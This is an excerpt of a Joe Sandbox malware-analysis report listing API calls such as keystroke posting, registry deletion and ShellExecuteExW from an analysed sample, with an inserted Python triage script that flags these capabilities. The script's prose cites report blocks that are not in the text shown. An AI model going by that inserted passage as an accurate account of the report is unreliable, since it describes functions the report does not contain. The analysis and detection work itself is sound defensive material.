                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorLast$_memmovehtonsinet_ntoaselect
                          • String ID:
                          • API String ID: 1718709218-0
                          • Opcode ID: 7569ba4a70aca6a953d22e4432a0b53b685bc3769953aff6beee9515443cd121
                          • Instruction ID: ef6db386dcffa6dbaeeca6a27ba89ea02e5d6e7d98edc685318d30c230481830
                          • Opcode Fuzzy Hash: 7569ba4a70aca6a953d22e4432a0b53b685bc3769953aff6beee9515443cd121
                          • Instruction Fuzzy Hash: C1717B71508200ABD714EF64DC85F6BBBE8EB84714F144AADF956972E1DB30DD08CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __mtinitlocknum.LIBCMT ref: 00B2B744
                            • Part of subcall function 00B28A0C: __FF_MSGBANNER.LIBCMT ref: 00B28A21
                            • Part of subcall function 00B28A0C: __NMSG_WRITE.LIBCMT ref: 00B28A28
                            • Part of subcall function 00B28A0C: __malloc_crt.LIBCMT ref: 00B28A48
                          • __lock.LIBCMT ref: 00B2B757
                          • __lock.LIBCMT ref: 00B2B7A3
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00BB6948,00000018,00B36C2B,?,00000000,00000109), ref: 00B2B7BF
                          • RtlEnterCriticalSection.NTDLL(8000000C), ref: 00B2B7DC
                          • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00B2B7EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                          • String ID:
                          • API String ID: 1422805418-0
                          • Opcode ID: 5acb9457de5a3d661244b3e481d2ad9d3f40539969e2e5d2b28359aa3d253297
                          • Instruction ID: 4269356d11868621ac737267cd8a3d94c7cd61644e7158279661bad57aa5648a
                          • Opcode Fuzzy Hash: 5acb9457de5a3d661244b3e481d2ad9d3f40539969e2e5d2b28359aa3d253297
                          • Instruction Fuzzy Hash: 544114719102258BEB109FA8F884BA8B7E4EF45325F108299E42DAF2E1DF749840CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B4A1CE
                            • Part of subcall function 00B2010A: std::exception::exception.LIBCMT ref: 00B2013E
                            • Part of subcall function 00B2010A: __CxxThrowException@8.LIBCMT ref: 00B20153
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B4A205
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B4A221
                          • _memmove.LIBCMT ref: 00B4A26F
                          • _memmove.LIBCMT ref: 00B4A28C
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B4A29B
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B4A2B0
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B4A2CF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                          • String ID:
                          • API String ID: 256516436-0
                          • Opcode ID: 925c92b535ce5f70e4486ee3132ed9a10beb43a56a71bad4deb965c6a8ed4033
                          • Instruction ID: bb357a8ad8d1ce76c10301329fc965057d4f29dc2395e496faee4bbfc6981f5d
                          • Opcode Fuzzy Hash: 925c92b535ce5f70e4486ee3132ed9a10beb43a56a71bad4deb965c6a8ed4033
                          • Instruction Fuzzy Hash: 49318231900115EBCF00EFA5DC85AAEBBF9FF45310B1480A5F904AB296DB74DE54DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00B68CF3
                          • GetDC.USER32(00000000), ref: 00B68CFB
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B68D06
                          • ReleaseDC.USER32(00000000,00000000), ref: 00B68D12
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00B68D4E
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B68D5F
                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B68D99
                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B68DB9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                          • String ID:
                          • API String ID: 3864802216-0
                          • Opcode ID: 75f2f4c077ce7db0a81c241b981d9b2a2fa6535d109557996064a37d1e48bf76
                          • Instruction ID: bcc8f6d2874b9e3beef99afec7f4d7bae0c7678467d4b501afabb7d810c4e5d2
                          • Opcode Fuzzy Hash: 75f2f4c077ce7db0a81c241b981d9b2a2fa6535d109557996064a37d1e48bf76
                          • Instruction Fuzzy Hash: E5316D72200214BBEB109F51DC89FEA3BA9EF49755F044165FE08DB1E1DAB99C41CB70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d255e691ca89a2d14e2e011879c0af9915c521e751aa38eee3e7b91086e5e51e
                          • Instruction ID: 4ddf10a6c7bce9cd0a03f2f59a0211d32448f451169bcb36a8e0a43362972c89
                          • Opcode Fuzzy Hash: d255e691ca89a2d14e2e011879c0af9915c521e751aa38eee3e7b91086e5e51e
                          • Instruction Fuzzy Hash: C3713871900109EFDB04CF98C889EFEBBB5FF89314F64C199F915AA291C7349A81CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • CoInitialize.OLE32 ref: 00B5B298
                          • VariantInit.OLEAUT32(?), ref: 00B5B410
                          • VariantClear.OLEAUT32(?), ref: 00B5B471
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Variant$ClearInitInitialize__itow__swprintf
                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                          • API String ID: 4106155388-1287834457
                          • Opcode ID: f6feec0a6231872ca730e9147c741a4038bf931b3e96dfa3e5754ca1ac3fd306
                          • Instruction ID: d564fd23157d955ab95a0cfec3a37117158bc72575e727beded7f3b97fbb10b9
                          • Opcode Fuzzy Hash: f6feec0a6231872ca730e9147c741a4038bf931b3e96dfa3e5754ca1ac3fd306
                          • Instruction Fuzzy Hash: 1F618730204201AFD710DF54C885F6EBBE8EF88715F1448D9F985AB2A1C770EE49CB96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B6214B
                          • _memset.LIBCMT ref: 00B62214
                          • ShellExecuteExW.SHELL32(?), ref: 00B62259
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                            • Part of subcall function 00B03BCF: _wcscpy.LIBCMT ref: 00B03BF2
                          • CloseHandle.KERNEL32(00000000), ref: 00B62320
                          • FreeLibrary.KERNEL32(00000000), ref: 00B6232F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                          • String ID: @
                          • API String ID: 4082843840-2766056989
                          • Opcode ID: 4d1c174cb3daa46814366f6c0d0d6f58448d607ecc852cbafc1aa65ac14abe97
                          • Instruction ID: 6eb8394ab0c273cfc361a6efca8efb14a617e6d58d7049b35eaff216527411f9
                          • Opcode Fuzzy Hash: 4d1c174cb3daa46814366f6c0d0d6f58448d607ecc852cbafc1aa65ac14abe97
                          • Instruction Fuzzy Hash: 80719C74A00619DFDF04EFA4C8959AEBBF5FF48310F148099E849AB391DB34AE40CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetParent.USER32(?), ref: 00B4481D
                          • GetKeyboardState.USER32(?), ref: 00B44832
                          • SetKeyboardState.USER32(?), ref: 00B44893
                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B448C1
                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B448E0
                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B44926
                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B44949
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: dc6ad4e7f756f902fa08d39072a1745e70b4eba08b0a703f9dc5bcf686e94d32
                          • Instruction ID: bcc5b5400691ca0fa46ebfbbb219705de88293823d9101d286ba69e0fa3e5751
                          • Opcode Fuzzy Hash: dc6ad4e7f756f902fa08d39072a1745e70b4eba08b0a703f9dc5bcf686e94d32
                          • Instruction Fuzzy Hash: 5951D3A05087D53DFB3642248C45BBBBFE99B06304F0885C9E1D5568C2C7E4EEA8F750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetParent.USER32(00000000), ref: 00B44638
                          • GetKeyboardState.USER32(?), ref: 00B4464D
                          • SetKeyboardState.USER32(?), ref: 00B446AE
                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B446DA
                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B446F7
                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B4473B
                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B4475C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 9c10476db1cdfac186db152b901ef6cc1fdfced3735fb9feaa1ff03e8809bf57
                          • Instruction ID: 823e5f53faf4f8acb6ad3d5d1f1fd1cb2ba3d81e255344f5de9754ddbf9bb1e5
                          • Opcode Fuzzy Hash: 9c10476db1cdfac186db152b901ef6cc1fdfced3735fb9feaa1ff03e8809bf57
                          • Instruction Fuzzy Hash: 0651E3A06047D63DFB3687248C45BB6BFE9EB06304F0884C9E1D4468C2D7A4EEA9F751
                          Uniqueness

                          Uniqueness Score: -1.00%
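The two functions just above (GetKeyboardState/SetKeyboardState followed by PostMessageW with message 0x100 or 0x101 and wParam 0x10, 0x11, 0x12, 0x5B), the RegConnectRegistryW function, and the earlier function whose API ID combines Toolhelp32 snapshot, OpenProcess and TerminateProcess with the string SeDebugPrivilege each describe a capability only through a raw API list. The Python below is an added example, not part of the Joe Sandbox report: it parses function blocks written in this report's text layout into records, decodes the PostMessageW arguments into their Win32 names (WM_KEYDOWN/WM_KEYUP, VK_SHIFT/VK_CONTROL/VK_MENU/VK_LWIN), and applies a small rule set to name the capabilities. The rule names, the scoring logic and the sample excerpt are constructed for illustration; the report itself emits none of them.

```python
"""Parse Joe Sandbox function blocks (the "APIs" / "Similarity" text of the
report) into records and flag capability combinations a triager cares about.

Added example. SAMPLE is a constructed excerpt in the report's layout; the rules
in flag() are an assumption about what is worth flagging, not report output.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: three function blocks copied in the report's text layout.
SAMPLE = """\
APIs
• GetParent.USER32(?), ref: 00B4481D
• GetKeyboardState.USER32(?), ref: 00B44832
• SetKeyboardState.USER32(?), ref: 00B44893
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00B448C1
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B44949
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
Uniqueness
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B62AE7
Similarity
• API ID: BuffCharConnectRegistryUpper_memmove
• String ID:
Uniqueness
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
Uniqueness
"""

# Matches "• Name.MODULE(args), ref: ADDR". CRT entries such as "_memmove.LIBCMT
# ref: ..." carry no argument list and are intentionally not captured.
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*?)\), ref: ([0-9A-F]{8})$")
WM = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP"}          # Win32 message ids
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}


@dataclass
class Func:
    apis: list = field(default_factory=list)   # (name, module, [args], ref)
    api_id: str = ""
    string_id: str = ""


def parse_blocks(text):
    """Split report text into one Func per function block ("Uniqueness" closes a block)."""
    funcs, cur = [], Func()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            name, mod, args, ref = m.groups()
            cur.apis.append((name, mod, [a for a in args.split(",") if a], ref))
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• String ID:"):
            cur.string_id = line.split(":", 1)[1].strip()
        elif line == "Uniqueness":
            funcs.append(cur)
            cur = Func()
    return funcs


def decode_postmessage(args):
    """Map the hex (hwnd, msg, wParam, lParam) args of PostMessageW to names; None if unparsable."""
    try:
        msg, wparam = int(args[1], 16), int(args[2], 16)
    except (IndexError, ValueError):
        return None
    return WM.get(msg), VK.get(wparam)


def flag(func):
    """Apply the assumed capability rules to one parsed function; returns [(rule, detail)]."""
    hits = []
    names = {a[0] for a in func.apis}
    # Process termination with debug privilege: Toolhelp32 walk + TerminateProcess.
    if ("Terminate" in func.api_id and "Toolhelp32" in func.api_id
            and "SeDebugPrivilege" in func.string_id):
        hits.append(("process_kill", "Toolhelp32 snapshot + TerminateProcess with SeDebugPrivilege"))
    # Synthetic keystrokes: keyboard state rewritten, then WM_KEYDOWN/WM_KEYUP posted.
    keys = [decode_postmessage(a[2]) for a in func.apis if a[0] == "PostMessageW"]
    keys = [k for k in keys if k and k[0]]
    if ("SetKeyboardState" in names or "KeyboardState" in func.api_id) and keys:
        hits.append(("keystroke_injection", ", ".join(f"{m}:{v}" for m, v in keys)))
    # Remote registry access via RegConnectRegistryW.
    if "RegConnectRegistryW" in names or "ConnectRegistry" in func.api_id:
        hits.append(("remote_registry", "RegConnectRegistryW opens another host's registry"))
    return hits


def triage(text):
    """Return {block_index: hits} for every block that triggers at least one rule."""
    results = {}
    for i, f in enumerate(parse_blocks(text)):
        hits = flag(f)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE).items():
        for rule, detail in hits:
            print(f"function #{idx}: {rule} ({detail})")
```

Pointing `triage` at the full report text rather than SAMPLE works unchanged, because the parser keys only on the "• ", "API ID:", "String ID:" and "Uniqueness" lines that every block in this section carries. The API ID and String ID fields are matched by substring because the report concatenates word tokens without separators, so exact token splitting is not possible.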

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcsncpy$LocalTime
                          • String ID:
                          • API String ID: 2945705084-0
                          • Opcode ID: c56a89769771742ba86958b6a8f9f138833bb9c03b799fcd1707895f9408b8f5
                          • Instruction ID: 6441113bc9fb41ce497e89203108a051f0d52bf5c234b4c459f792933531ba14
                          • Opcode Fuzzy Hash: c56a89769771742ba86958b6a8f9f138833bb9c03b799fcd1707895f9408b8f5
                          • Instruction Fuzzy Hash: 3C412E65C10224B5CF11EBF8D886ACFB7ECEF15310F9088A6E558F7121EA30E655C7A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B69DB0
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B69E57
                          • IsMenu.USER32(?), ref: 00B69E6F
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B69EB7
                          • DrawMenuBar.USER32 ref: 00B69ED0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Menu$Item$DrawInfoInsert_memset
                          • String ID: 0
                          • API String ID: 3866635326-4108050209
                          • Opcode ID: 9fda03462ba267b10cd01b8dec818a5213fc1b7d27bb9751298316d68890321b
                          • Instruction ID: 6cf8013b90b85f3a61ad5f95b07f0f78120a187ea6ea0f037cb0738638a843ba
                          • Opcode Fuzzy Hash: 9fda03462ba267b10cd01b8dec818a5213fc1b7d27bb9751298316d68890321b
                          • Instruction Fuzzy Hash: 83414975A01209EFDB20DF54D884EDABBF8FF09364F0484AAE909A7251D735ED58CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00B63C92
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B63CBC
                          • FreeLibrary.KERNEL32(00000000), ref: 00B63D71
                            • Part of subcall function 00B63C63: RegCloseKey.ADVAPI32(?), ref: 00B63CD9
                            • Part of subcall function 00B63C63: FreeLibrary.KERNEL32(?), ref: 00B63D2B
                            • Part of subcall function 00B63C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B63D4E
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B63D16
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                          • String ID:
                          • API String ID: 395352322-0
                          • Opcode ID: eea196fc28f9bba8b46bc9f82a652c3d66ef7fa9e8e22dac5f8883c0a6213b29
                          • Instruction ID: 714685e4ac581b561bfb1d14f8fea6ed67c28f682271b819622dd0e08ccc2386
                          • Opcode Fuzzy Hash: eea196fc28f9bba8b46bc9f82a652c3d66ef7fa9e8e22dac5f8883c0a6213b29
                          • Instruction Fuzzy Hash: 93310871901209BFDB159B94DC99EFEB7FCEF09700F1005BAE512A2190DA749F89DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B68DF4
                          • GetWindowLongW.USER32(014BACA0,000000F0), ref: 00B68E27
                          • GetWindowLongW.USER32(014BACA0,000000F0), ref: 00B68E5C
                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B68E8E
                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B68EB8
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B68EC9
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B68EE3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LongWindow$MessageSend
                          • String ID:
                          • API String ID: 2178440468-0
